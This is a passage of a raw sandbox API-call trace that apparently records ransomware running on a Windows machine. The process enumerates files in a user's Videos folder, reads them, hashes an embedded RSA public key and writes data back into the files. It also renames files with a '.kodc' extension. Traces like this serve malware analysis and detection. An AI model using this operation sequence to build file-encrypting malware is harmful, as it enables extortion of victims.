lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0100.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c220 [0100.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b18 [0100.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c268 [0100.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b30 [0100.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b60 [0100.028] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.028] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b78 [0100.028] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0100.028] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.028] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.028] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0100.028] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b60 | out: hHeap=0x630000) returned 1 [0100.028] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b78 | out: hHeap=0x630000) returned 1 [0100.028] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.028] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.028] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.028] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.028] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0100.028] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7b78 [0100.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0100.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7b60 [0100.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0100.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0100.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0100.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0100.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.029] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0100.029] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b78 | out: hHeap=0x630000) returned 1 [0100.029] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.029] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b60 | out: hHeap=0x630000) returned 1 [0100.029] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.029] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.029] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.029] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.029] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0100.030] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.030] GetCurrentThreadId () returned 0x42c [0100.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0100.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba6398 [0100.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0100.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0100.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0100.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0100.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.030] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.030] GetCurrentThreadId () returned 0x42c [0100.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.030] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0100.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0100.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0100.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0100.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0100.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0100.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0100.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0100.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0100.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b60 [0100.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0100.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0100.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0100.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0100.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b78 [0100.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0100.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0100.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0100.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b48 [0100.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0100.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7b90 [0100.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a28 [0100.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0100.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0100.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0100.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b60 | out: hHeap=0x630000) returned 1 [0100.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b60 [0100.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0100.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0100.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0100.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0100.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c770 [0100.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0100.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b60 | out: hHeap=0x630000) returned 1 [0100.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0100.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0100.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0100.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0100.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0100.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0100.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0100.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0100.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0100.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0100.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b90 | out: hHeap=0x630000) returned 1 [0100.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.034] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x4193, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.034] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.034] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.034] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.034] CloseHandle (hObject=0x5cc) returned 1 [0100.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0100.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0100.035] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9siqfvi4c0aYkxA3.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9siqfvi4c0aykxa3.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9siqfvi4c0aYkxA3.swf.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9siqfvi4c0aykxa3.swf.kodc")) returned 1 [0100.037] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0100.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0100.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0100.038] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini") returned=".ini" [0100.038] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a01d860, ftCreationTime.dwHighDateTime=0x1d5b637, ftLastAccessTime.dwLowDateTime=0xa4a69270, ftLastAccessTime.dwHighDateTime=0x1d5bbf1, ftLastWriteTime.dwLowDateTime=0xa4a69270, ftLastWriteTime.dwHighDateTime=0x1d5bbf1, nFileSizeHigh=0x0, nFileSizeLow=0x3af0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F-YVCgA.swf", cAlternateFileName="")) returned 1 [0100.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0100.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0100.038] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\F-YVCgA.swf") returned=".swf" [0100.038] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\F-YVCgA.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\f-yvcga.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.038] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=15088) returned 1 [0100.038] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.041] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x3aca, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.041] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.042] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x3af0, lpOverlapped=0x0) returned 1 [0100.043] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0100.043] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.043] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.043] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0100.044] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.044] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.044] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0100.044] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.044] GetLastError () returned 0x0 [0100.044] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.044] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0100.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.045] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.045] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.045] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x3af0) returned 0x9ba6d90 [0100.045] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.046] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.046] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.046] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.046] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c268 [0100.046] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b30 [0100.046] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c2b0 [0100.046] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b48 [0100.046] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b78 [0100.046] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.046] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b90 [0100.046] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0100.046] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.046] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.046] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0100.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b78 | out: hHeap=0x630000) returned 1 [0100.047] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b90 | out: hHeap=0x630000) returned 1 [0100.047] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.047] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.047] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.047] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.047] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0100.047] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7b90 [0100.047] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0100.047] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7b78 [0100.047] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) 